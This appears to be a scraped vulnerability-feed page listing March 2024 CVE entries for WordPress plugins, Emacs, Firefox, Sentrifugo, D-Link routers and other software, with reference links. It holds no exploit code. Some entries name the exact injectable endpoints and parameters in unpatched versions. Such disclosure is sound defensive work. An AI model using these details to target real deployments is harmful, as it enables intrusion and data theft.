New CVEs | Past Year (Since Jan 2024 till Now): 4696
Known Hacker Groups: 73
Commonly Used Tools & Technologies: 27

New CVEs | Past Year

Starting from the Latest

CVE    2024    30270    Candidate    ** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.        Assigned (20240326)

CVE    2024    30235    Candidate    Missing Authorization vulnerability in Themeisle Multiple Page Generator Plugin – MPG. This issue affects Multiple Page Generator Plugin – MPG: from n/a through 3.4.0.    MISC:https://patchstack.com/database/vulnerability/multiple-pages-generator-by-porthas/wordpress-multiple-page-generator-plugin-mpg-plugin-3-4-0-broken-access-control-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/multiple-pages-generator-by-porthas/wordpress-multiple-page-generator-plugin-mpg-plugin-3-4-0-broken-access-control-vulnerability?_s_id=cve    Assigned (20240326)

CVE    2024    30234    Candidate    Missing Authorization vulnerability in Wholesale Team WholesaleX. This issue affects WholesaleX: from n/a through 1.3.1.    MISC:https://patchstack.com/database/vulnerability/wholesalex/wordpress-wholesalex-plugin-1-3-1-broken-access-control-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wholesalex/wordpress-wholesalex-plugin-1-3-1-broken-access-control-vulnerability?_s_id=cve    Assigned (20240326)
CVE    2024    30233    Candidate    Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wholesale Team WholesaleX. This issue affects WholesaleX: from n/a through 1.3.1.    MISC:https://patchstack.com/database/vulnerability/wholesalex/wordpress-wholesalex-plugin-1-3-1-sensitive-data-exposure-on-user-export-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wholesalex/wordpress-wholesalex-plugin-1-3-1-sensitive-data-exposure-on-user-export-vulnerability?_s_id=cve    Assigned (20240326)
CVE    2024    30232    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Exclusive Addons Exclusive Addons Elementor allows Stored XSS. This issue affects Exclusive Addons Elementor: from n/a through 2.6.9.    MISC:https://patchstack.com/database/vulnerability/exclusive-addons-for-elementor/wordpress-exclusive-addons-for-elementor-plugin-2-6-9-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/exclusive-addons-for-elementor/wordpress-exclusive-addons-for-elementor-plugin-2-6-9-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240326)
CVE    2024    30231    Candidate    Unrestricted Upload of File with Dangerous Type vulnerability in WebToffee Product Import Export for WooCommerce. This issue affects Product Import Export for WooCommerce: from n/a through 2.4.1.    MISC:https://patchstack.com/database/vulnerability/product-import-export-for-woo/wordpress-product-import-export-for-woocommerce-plugin-2-4-1-arbitrary-file-upload-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/product-import-export-for-woo/wordpress-product-import-export-for-woocommerce-plugin-2-4-1-arbitrary-file-upload-vulnerability?_s_id=cve    Assigned (20240326)
CVE    2024    30205    Candidate    In Emacs before 29.3, Org mode considers contents of remote files to be trusted. This affects Org Mode before 9.6.23.    MISC:https://git.savannah.gnu.org/cgit/emacs.git/commit/?h=emacs-29&id=2bc865ace050ff118db43f01457f95f95112b877   |   MISC:https://git.savannah.gnu.org/cgit/emacs.git/tree/etc/NEWS?h=emacs-29   |   MISC:https://git.savannah.gnu.org/cgit/emacs/org-mode.git/commit/?id=4255d5dcc0657915f90e4fba7e0a5514cced514d    Assigned (20240325)
CVE    2024    30204    Candidate    In Emacs before 29.3, LaTeX preview is enabled by default for e-mail attachments.    MISC:https://git.savannah.gnu.org/cgit/emacs.git/commit/?h=emacs-29&id=6f9ea396f49cbe38c2173e0a72ba6af3e03b271c   |   MISC:https://git.savannah.gnu.org/cgit/emacs.git/tree/etc/NEWS?h=emacs-29    Assigned (20240325)
CVE    2024    30203    Candidate    In Emacs before 29.3, Gnus treats inline MIME contents as trusted.    MISC:https://git.savannah.gnu.org/cgit/emacs.git/commit/?h=emacs-29&id=937b9042ad7426acdcca33e3d931d8f495bdd804   |   MISC:https://git.savannah.gnu.org/cgit/emacs.git/tree/etc/NEWS?h=emacs-29    Assigned (20240325)
CVE    2024    30202    Candidate    In Emacs before 29.3, arbitrary Lisp code is evaluated as part of turning on Org mode. This affects Org Mode before 9.6.23.    MISC:https://git.savannah.gnu.org/cgit/emacs.git/commit/?h=emacs-29&id=befa9fcaae29a6c9a283ba371c3c5234c7f644eb   |   MISC:https://git.savannah.gnu.org/cgit/emacs.git/tree/etc/NEWS?h=emacs-29   |   MISC:https://git.savannah.gnu.org/cgit/emacs/org-mode.git/commit/?id=003ddacf1c8d869b1858181c29ea21b731a8d8d9    Assigned (20240325)
CVE    2024    30187    Candidate    Anope before 2.0.15 does not prevent resetting the password of a suspended account.    MISC:https://github.com/anope/anope/commit/2b7872139c40ea5b0ca96c1d6595b7d5f9fa60a5   |   MISC:https://github.com/anope/anope/issues/351    Assigned (20240325)
CVE    2024    30161    Candidate    In Qt before 6.5.6 and 6.6.x before 6.6.3, the wasm component may access QNetworkReply header data via a dangling pointer.    MISC:https://codereview.qt-project.org/c/qt/qtbase/+/544314    Assigned (20240324)
CVE    2024    30156    Candidate    Varnish Cache before 7.3.2 and 7.4.x before 7.4.3 (and before 6.0.13 LTS), and Varnish Enterprise 6 before 6.0.12r6, allows credits exhaustion for an HTTP/2 connection control flow window, aka a Broke Window Attack.    MISC:https://varnish-cache.org/docs/7.5/whats-new/changes-7.5.html#security   |   MISC:https://varnish-cache.org/security/VSV00014.html    Assigned (20240324)
CVE    2024    29944    Candidate    An attacker was able to inject an event handler into a privileged object that would allow arbitrary JavaScript execution in the parent process. Note: This vulnerability affects Desktop Firefox only, it does not affect mobile versions of Firefox. This vulnerability affects Firefox < 124.0.1 and Firefox ESR < 115.9.1.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1886852   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1886852   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-15/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-15/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-16/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-16/   |   MLIST:[debian-lts-announce] 20240325 [SECURITY] [DLA 3775-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html    Assigned (20240321)
CVE    2024    29943    Candidate    An attacker was able to perform an out-of-bounds read or write on a JavaScript object by fooling range-based bounds check elimination. This vulnerability affects Firefox < 124.0.1.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1886849   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1886849   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-15/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-15/    Assigned (20240321)
CVE    2024    29937    Candidate    NFS in a BSD derived codebase, as used in OpenBSD through 7.4 and FreeBSD through 14.0-RELEASE, allows remote attackers to execute arbitrary code via a bug that is unrelated to memory corruption.    MISC:https://news.ycombinator.com/item?id=39778203   |   MISC:https://t2.fi/schedule/2024/   |   MISC:https://www.signedness.org/t2.fi.2024/   |   MISC:https://www.youtube.com/watch?v=i_JOkHaCdzk    Assigned (20240321)
CVE    2024    29916    Candidate    The dormakaba Saflok system before the November 2023 software update allows an attacker to unlock arbitrary doors at a property via forged keycards, if the attacker has obtained one active or expired keycard for the specific property, aka the "Unsaflok" issue. This occurs, in part, because the key derivation function relies only on a UID. This affects, for example, Saflok MT, and the Confidant, Quantum, RT, and Saffire series.    MISC:https://news.ycombinator.com/item?id=39779291   |   MISC:https://unsaflok.com   |   MISC:https://www.wired.com/story/saflok-hotel-lock-unsaflok-hack-technique/    Assigned (20240321)
CVE    2024    29883    Candidate    CreateWiki is Miraheze's MediaWiki extension for requesting & creating wikis. Suppression of wiki requests does not work as intended, and always restricts visibility to those with the `(createwiki)` user right regardless of the settings one sets on a given wiki request. This may expose information to users who are not supposed to be able to access it.    MISC:https://gist.githubusercontent.com/redbluegreenhat/0da1ebb7185b241ce1ac6ba1e8f0b98d/raw/44c4a229aacc8233808c767a79af9e4fd581ae68/T11993.patch   |   URL:https://gist.githubusercontent.com/redbluegreenhat/0da1ebb7185b241ce1ac6ba1e8f0b98d/raw/44c4a229aacc8233808c767a79af9e4fd581ae68/T11993.patch   |   MISC:https://github.com/miraheze/CreateWiki/security/advisories/GHSA-8wjf-mxjg-j8p9   |   URL:https://github.com/miraheze/CreateWiki/security/advisories/GHSA-8wjf-mxjg-j8p9   |   MISC:https://issue-tracker.miraheze.org/T11993   |   URL:https://issue-tracker.miraheze.org/T11993    Assigned (20240321)
CVE    2024    29881    Candidate    TinyMCE is an open source rich text editor. A cross-site scripting (XSS) vulnerability was discovered in TinyMCE’s content loading and content inserting code. An SVG image could be loaded through an `object` or `embed` element and that image could potentially contain an XSS payload. This vulnerability is fixed in 6.8.1 and 7.0.0.    MISC:https://github.com/tinymce/tinymce/commit/bcdea2ad14e3c2cea40743fb48c63bba067ae6d1   |   URL:https://github.com/tinymce/tinymce/commit/bcdea2ad14e3c2cea40743fb48c63bba067ae6d1   |   MISC:https://github.com/tinymce/tinymce/security/advisories/GHSA-5359-pvf2-pw78   |   URL:https://github.com/tinymce/tinymce/security/advisories/GHSA-5359-pvf2-pw78   |   MISC:https://www.tiny.cloud/docs/tinymce/6/6.8.1-release-notes/#new-convert_unsafe_embeds-option-that-controls-whether-object-and-embed-elements-will-be-converted-to-more-restrictive-alternatives-namely-img-for-image-mime-types-video-for-video-mime-types-audio-audio-mime-types-or-iframe-for-other-or-unspecified-mime-types   |   URL:https://www.tiny.cloud/docs/tinymce/6/6.8.1-release-notes/#new-convert_unsafe_embeds-option-that-controls-whether-object-and-embed-elements-will-be-converted-to-more-restrictive-alternatives-namely-img-for-image-mime-types-video-for-video-mime-types-audio-audio-mime-types-or-iframe-for-other-or-unspecified-mime-types   |   MISC:https://www.tiny.cloud/docs/tinymce/7/7.0-release-notes/#convert_unsafe_embeds-editor-option-is-now-defaulted-to-true   |   URL:https://www.tiny.cloud/docs/tinymce/7/7.0-release-notes/#convert_unsafe_embeds-editor-option-is-now-defaulted-to-true    Assigned (20240321)
CVE    2024    29880    Candidate    In JetBrains TeamCity before 2023.11 users with access to the agent machine might obtain permissions of the user running the agent process    MISC:https://www.jetbrains.com/privacy-security/issues-fixed/   |   URL:https://www.jetbrains.com/privacy-security/issues-fixed/    Assigned (20240321)
CVE    2024    29879    Candidate    Cross-Site Scripting (XSS) vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/index/getdepartments/format/html, 'business_id' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted URL to the victim and steal their session data.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo    Assigned (20240321)
CVE    2024    29878    Candidate    Cross-Site Scripting (XSS) vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/sitepreference/add, 'description' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted URL to the victim and steal their session data.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo    Assigned (20240321)
CVE    2024    29877    Candidate    Cross-Site Scripting (XSS) vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/expenses/expensecategories/edit, 'expense_category_name' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted URL to the victim and steal their session data.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo    Assigned (20240321)
CVE    2024    29876    Candidate    SQL injection vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/reports/activitylogreport, 'sortby' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted query to the server and extract all the data from it.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo    Assigned (20240321)
CVE    2024    29875    Candidate    SQL injection vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/default/reports/exportactiveuserrpt, 'sort_name' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted query to the server and extract all the data from it.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo    Assigned (20240321)
CVE    2024    29874    Candidate    SQL injection vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/default/reports/activeuserrptpdf, 'sort_name' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted query to the server and extract all the data from it.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo    Assigned (20240321)
CVE    2024    29873    Candidate    SQL injection vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/reports/businessunits/format/html, 'bunitname' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted query to the server and extract all the data from it.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo    Assigned (20240321)
CVE    2024    29872    Candidate    SQL injection vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/empscreening/add, 'agencyids' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted query to the server and extract all the data from it.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo    Assigned (20240321)
CVE    2024    29871    Candidate    SQL injection vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/index/getdepartments/sentrifugo/index.php/index/updatecontactnumber, 'id' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted query to the server and extract all the data from it.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo    Assigned (20240321)
CVE    2024    29870    Candidate    SQL injection vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/index/getdepartments/format/html, 'business_id' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted query to the server and extract all the data from it.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo    Assigned (20240321)
CVE    2024    29866    Candidate    Datalust Seq before 2023.4.11151 and 2024 before 2024.1.11146 has Incorrect Access Control because a Project Owner or Organization Owner can escalate to System privileges.    CONFIRM:https://github.com/datalust/seq-tickets/issues/2127   |   MISC:https://datalust.co    Assigned (20240321)
CVE    2024    29865    Candidate    Logpoint before 7.1.0 allows Self-XSS on the LDAP authentication page via the username to the LDAP login form.    MISC:https://servicedesk.logpoint.com/hc/en-us/articles/17710372214045-Self-XSS-on-LDAP-authentication    Assigned (20240321)
CVE    2024    29864    Candidate    Distrobox before 1.7.0.1 allows attackers to execute arbitrary code via command injection into exported executables.    MISC:https://github.com/89luca89/distrobox/commit/82a69f0a234e73e447d0ea8c8b3443b84fd31944   |   MISC:https://github.com/89luca89/distrobox/issues/1275    Assigned (20240321)
CVE    2024    29862    Candidate    The Kerlink firewall in ChirpStack chirpstack-mqtt-forwarder before 4.2.1 and chirpstack-gateway-bridge before 4.0.11 wrongly accepts certain TCP packets when a connection is not in the ESTABLISHED state.    MISC:https://github.com/chirpstack/chirpstack-gateway-bridge/commit/0c1e80c9fa9f5d093ff62903caedad86ec4640b6   |   MISC:https://github.com/chirpstack/chirpstack-mqtt-forwarder/commit/4fa9e6eaaec8c3ca49ebfbf6317572671f17700f    Assigned (20240321)
CVE    2024    29859    Candidate    In MISP before 2.4.187, add_misp_export in app/Controller/EventsController.php does not properly check for a valid file upload.    MISC:https://github.com/MISP/MISP/commit/238010bfd004680757b324cba0c6344f77a25399    Assigned (20240321)
CVE    2024    29858    Candidate    In MISP before 2.4.187, __uploadLogo in app/Controller/OrganisationsController.php does not properly check for a valid logo upload.    MISC:https://github.com/MISP/MISP/commit/6a2986be6aad6b37858b4869e238f517b295c111    Assigned (20240321)
CVE    2024    29732    Candidate    A SQL injection has been found in the SCAN_VISIO eDocument Suite Web Viewer of Abast. This vulnerability allows an unauthenticated user to retrieve, update and delete all the information in the database. This vulnerability was found on the login page via the "user" parameter.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/sql-injection-vulnerability-scanvisio-edocument-suite-web-viewer-abast   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/sql-injection-vulnerability-scanvisio-edocument-suite-web-viewer-abast    Assigned (20240319)
CVE    2024    29684    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /src/dede/makehtml_homepage.php allowing a remote attacker to execute arbitrary code.    MISC:https://github.com/iimiss/cms/blob/main/1.md    Assigned (20240319)
CVE    2024    29666    Candidate    Insecure Permissions vulnerability in Vehicle Monitoring platform system CMSV6 v.7.31.0.2 through v.7.32.0.3 allows a remote attacker to escalate privileges via the default password component.    MISC:https://github.com/whgojp/cve-reports/wiki/There-is-a-weak-password-in-the-CMSV6-vehicle-monitoring-platform-system    Assigned (20240319)
CVE    2024    29650    Candidate    An issue in @thi.ng/paths v.5.1.62 and before allows a remote attacker to execute arbitrary code via the mutIn and mutInManyUnsafe components.    MISC:https://gist.github.com/tariqhawis/1bc340ca5ea6ae115c9ab9665cfd5921   |   MISC:https://learn.snyk.io/lesson/prototype-pollution/#a0a863a5-fd3a-539f-e1ed-a0769f6c6e3b    Assigned (20240319)
CVE    2024    29644    Candidate    Cross Site Scripting vulnerability in dcat-admin v.2.1.3 and before allows a remote attacker to execute arbitrary code via a crafted script to the user login box.    MISC:http://dcat-admin.com   |   MISC:https://github.com/jqhph/dcat-admin   |   MISC:https://www.yuque.com/yangtu-swjrh/oc6nqi/epcbz5y1grl4il1m    Assigned (20240319)
CVE    2024    29515    Candidate    File Upload vulnerability in lepton v.7.1.0 allows remote authenticated attackers to execute arbitrary code by uploading a crafted PHP file to the save.php and config.php components.    MISC:https://github.com/zzq66/cve7/    Assigned (20240319)
CVE    2024    29499    Candidate    Anchor CMS v0.12.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via /anchor/admin/users/delete/2.    MISC:https://github.com/daddywolf/cms/blob/main/1.md    Assigned (20240319)
CVE    2024    29474    Candidate    OneBlog v2.3.4 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the User Management module.    MISC:https://gitee.com/yadong.zhang/DBlog/issues/I98O8V    Assigned (20240319)
CVE    2024    29473    Candidate    OneBlog v2.3.4 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Role Management module.    MISC:https://gitee.com/yadong.zhang/DBlog/issues/I98O8V    Assigned (20240319)
CVE    2024    29472    Candidate    OneBlog v2.3.4 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Privilege Management module.    MISC:https://gitee.com/yadong.zhang/DBlog/issues/I98O8V    Assigned (20240319)
CVE    2024    29471    Candidate    OneBlog v2.3.4 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Notice Manage module.    MISC:https://gitee.com/yadong.zhang/DBlog/issues/I98O8V    Assigned (20240319)
CVE    2024    29470    Candidate    OneBlog v2.3.4 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the component {{rootpath}}/links.    MISC:https://gitee.com/yadong.zhang/DBlog/issues/I98O8V    Assigned (20240319)
CVE    2024    29469    Candidate    A stored cross-site scripting (XSS) vulnerability in OneBlog v2.3.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Category List parameter under the Lab module.    MISC:https://gitee.com/yadong.zhang/DBlog/issues/I98O8V    Assigned (20240319)
CVE    2024    29442    Candidate    An unauthorized access vulnerability has been discovered in ROS2 Humble Hawksbill versions where ROS_VERSION is 2 and ROS_PYTHON_VERSION is 3. This vulnerability could potentially allow a malicious user to gain unauthorized access to multiple ROS2 nodes remotely. Unauthorized access to these nodes could result in compromised system integrity, the execution of arbitrary commands, and disclosure of sensitive information.    MISC:https://github.com/yashpatelphd/CVE-2024-29442    Assigned (20240319)
CVE    2024    29419    Candidate    There is a Cross-site scripting (XSS) vulnerability in the Wireless settings under the Easy Setup Page of TOTOLINK X2000R before v1.0.0-B20231213.1013.    MISC:https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/X2000R/XSS_6_Wireless_settings/XSS.md   |   MISC:https://www.totolink.net/home/menu/detail/menu_listtpl/products/id/242/ids/33.html    Assigned (20240319)
CVE    2024    29385    Candidate    DIR-845L router <= v1.01KRb03 has an Unauthenticated remote code execution vulnerability in the cgibin binary via soapcgi_main function.    MISC:https://github.com/songah119/Report/blob/main/CI-1.md   |   MISC:https://www.dlink.com/en/security-bulletin/    Assigned (20240319)
CVE    2024    29374    Candidate    A Cross-Site Scripting (XSS) vulnerability exists in the way MOODLE 3.10.9 handles user input within the "GET /?lang=" URL parameter.    MISC:https://gist.github.com/fir3storm/f9c7f3ec1a6496498517ed216d2640b2    Assigned (20240319)
CVE    2024    29366    Candidate    A command injection vulnerability exists in the cgibin binary in DIR-845L router firmware <= v1.01KRb03.    MISC:https://github.com/20Yiju/DLink/blob/master/DIR-845L/CI.md   |   MISC:https://www.dlink.com/en/security-bulletin/    Assigned (20240319)
CVE    2024    29338    Candidate    Anchor CMS v0.12.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via /anchor/admin/categories/delete/2.    MISC:https://github.com/PWwwww123/cms/blob/main/1.md    Assigned (20240319)
CVE    2024    29303    Candidate    The delete admin users function of SourceCodester PHP Task Management System 1.0 is vulnerable to SQL Injection    MISC:https://packetstormsecurity.com/files/177737/Task-Management-System-1.0-SQL-Injection.html   |   MISC:https://www.strongboxit.com/    Assigned (20240319)
CVE    2024    29302    Candidate    SourceCodester PHP Task Management System 1.0 is vulnerable to SQL Injection via update-employee.php.    MISC:https://packetstormsecurity.com/files/177737/Task-Management-System-1.0-SQL-Injection.html   |   MISC:https://www.strongboxit.com/    Assigned (20240319)
CVE    2024    29301    Candidate    SourceCodester PHP Task Management System 1.0 is vulnerable to SQL Injection via update-admin.php?admin_id=    MISC:https://packetstormsecurity.com/files/177737/Task-Management-System-1.0-SQL-Injection.html   |   MISC:https://www.strongboxit.com/    Assigned (20240319)
CVE    2024    29275    Candidate    SQL injection vulnerability in SeaCMS version 12.9, allows remote unauthenticated attackers to execute arbitrary code and obtain sensitive information via the id parameter in class.php.    MISC:https://github.com/seacms-net/CMS/issues/15    Assigned (20240319)
CVE    2024    29273    Candidate    There is Stored Cross-Site Scripting (XSS) in dzzoffice 2.02.1 SC UTF8 in uploadfile to index.php, with the XSS payload in an SVG document.    MISC:https://github.com/zyx0814/dzzoffice/issues/244    Assigned (20240319)
CVE    2024    29272    Candidate    Arbitrary File Upload vulnerability in VvvebJs before version 1.7.5, allows unauthenticated remote attackers to execute arbitrary code and obtain sensitive information via the sanitizeFileName parameter in save.php.    MISC:https://github.com/givanz/VvvebJs/commit/c6422cfd4d835c2fa6d512645e30015f24538ef0   |   MISC:https://github.com/givanz/VvvebJs/issues/343    Assigned (20240319)
CVE    2024    29271    Candidate    Reflected Cross-Site Scripting (XSS) vulnerability in VvvebJs before version 1.7.7, allows remote attackers to execute arbitrary code and obtain sensitive information via the action parameter in save.php.    MISC:https://github.com/givanz/VvvebJs/commit/c0c0545b44b23acc288ef907fb498ce15b9b576e   |   MISC:https://github.com/givanz/VvvebJs/issues/342    Assigned (20240319)
CVE    2024    29244    Candidate    Shenzhen Libituo Technology Co., Ltd LBT-T300-mini v1.2.9 was discovered to contain a buffer overflow via the pin_code_3g parameter at /apply.cgi.    MISC:https://github.com/AdamRitz/lbtvul/blob/main/t300mini-2.md    Assigned (20240319)
CVE    2024    29243    Candidate    Shenzhen Libituo Technology Co., Ltd LBT-T300-mini v1.2.9 was discovered to contain a buffer overflow via the vpn_client_ip parameter at /apply.cgi.    MISC:https://github.com/AdamRitz/lbtvul/blob/main/t300mini-2.md    Assigned (20240319)
CVE    2024    29216    Candidate    Exposed IOCTL with insufficient access control issue exists in cg6kwin2k.sys prior to 2.1.7.0. By sending a specific IOCTL request, a user without the administrator privilege may perform I/O to arbitrary hardware port or physical address, resulting in erasing or altering the firmware.    MISC:https://jvn.jp/en/vu/JVNVU90671953/   |   URL:https://jvn.jp/en/vu/JVNVU90671953/   |   MISC:https://sangomakb.atlassian.net/wiki/spaces/DVC/pages/45351279/Natural+Access+Software+Download   |   URL:https://sangomakb.atlassian.net/wiki/spaces/DVC/pages/45351279/Natural+Access+Software+Download    Assigned (20240319)
CVE    2024    29203    Candidate    TinyMCE is an open source rich text editor. A cross-site scripting (XSS) vulnerability was discovered in TinyMCE’s content insertion code. This allowed `iframe` elements containing malicious code to execute when inserted into the editor. These `iframe` elements are restricted in their permissions by same-origin browser protections, but could still trigger operations such as downloading of malicious assets. This vulnerability is fixed in 6.8.1.    MISC:https://github.com/tinymce/tinymce/commit/bcdea2ad14e3c2cea40743fb48c63bba067ae6d1   |   URL:https://github.com/tinymce/tinymce/commit/bcdea2ad14e3c2cea40743fb48c63bba067ae6d1   |   MISC:https://github.com/tinymce/tinymce/security/advisories/GHSA-438c-3975-5x3f   |   URL:https://github.com/tinymce/tinymce/security/advisories/GHSA-438c-3975-5x3f   |   MISC:https://www.tiny.cloud/docs/tinymce/6/6.8.1-release-notes/#new-convert_unsafe_embeds-option-that-controls-whether-object-and-embed-elements-will-be-converted-to-more-restrictive-alternatives-namely-img-for-image-mime-types-video-for-video-mime-types-audio-audio-mime-types-or-iframe-for-other-or-unspecified-mime-types   |   URL:https://www.tiny.cloud/docs/tinymce/6/6.8.1-release-notes/#new-convert_unsafe_embeds-option-that-controls-whether-object-and-embed-elements-will-be-converted-to-more-restrictive-alternatives-namely-img-for-image-mime-types-video-for-video-mime-types-audio-audio-mime-types-or-iframe-for-other-or-unspecified-mime-types   |   MISC:https://www.tiny.cloud/docs/tinymce/7/7.0-release-notes/#sandbox_iframes-editor-option-is-now-defaulted-to-true   |   URL:https://www.tiny.cloud/docs/tinymce/7/7.0-release-notes/#sandbox_iframes-editor-option-is-now-defaulted-to-true    Assigned (20240318)
CVE    2024    29199    Candidate    Nautobot is a Network Source of Truth and Network Automation Platform. A number of Nautobot URL endpoints were found to be improperly accessible to unauthenticated (anonymous) users. These endpoints will not disclose any Nautobot data to an unauthenticated user unless the Nautobot configuration variable EXEMPT_VIEW_PERMISSIONS is changed from its default value (an empty list) to permit access to specific data by unauthenticated users. This vulnerability is fixed in 1.6.16 and 2.1.9.    MISC:https://github.com/nautobot/nautobot/commit/2fd95c365f8477b26e06d60b999ddd36882d5750   |   URL:https://github.com/nautobot/nautobot/commit/2fd95c365f8477b26e06d60b999ddd36882d5750   |   MISC:https://github.com/nautobot/nautobot/commit/dd623e6c3307f48b6357fcc91925bcad5192abfb   |   URL:https://github.com/nautobot/nautobot/commit/dd623e6c3307f48b6357fcc91925bcad5192abfb   |   MISC:https://github.com/nautobot/nautobot/pull/5464   |   URL:https://github.com/nautobot/nautobot/pull/5464   |   MISC:https://github.com/nautobot/nautobot/pull/5465   |   URL:https://github.com/nautobot/nautobot/pull/5465   |   MISC:https://github.com/nautobot/nautobot/releases/tag/v1.6.16   |   URL:https://github.com/nautobot/nautobot/releases/tag/v1.6.16   |   MISC:https://github.com/nautobot/nautobot/releases/tag/v2.1.9   |   URL:https://github.com/nautobot/nautobot/releases/tag/v2.1.9   |   MISC:https://github.com/nautobot/nautobot/security/advisories/GHSA-m732-wvh2-7cq4   |   URL:https://github.com/nautobot/nautobot/security/advisories/GHSA-m732-wvh2-7cq4    Assigned (20240318)
CVE    2024    29196    Candidate    phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. There is a Path Traversal vulnerability in Attachments that allows attackers with admin rights to upload malicious files to other locations of the web root. This vulnerability is fixed in 3.2.6.    MISC:https://github.com/thorsten/phpMyFAQ/commit/7ae2559f079cd5fc9948b6fdfb87581f93840f62   |   URL:https://github.com/thorsten/phpMyFAQ/commit/7ae2559f079cd5fc9948b6fdfb87581f93840f62   |   MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-mmh6-5cpf-2c72   |   URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-mmh6-5cpf-2c72    Assigned (20240318)
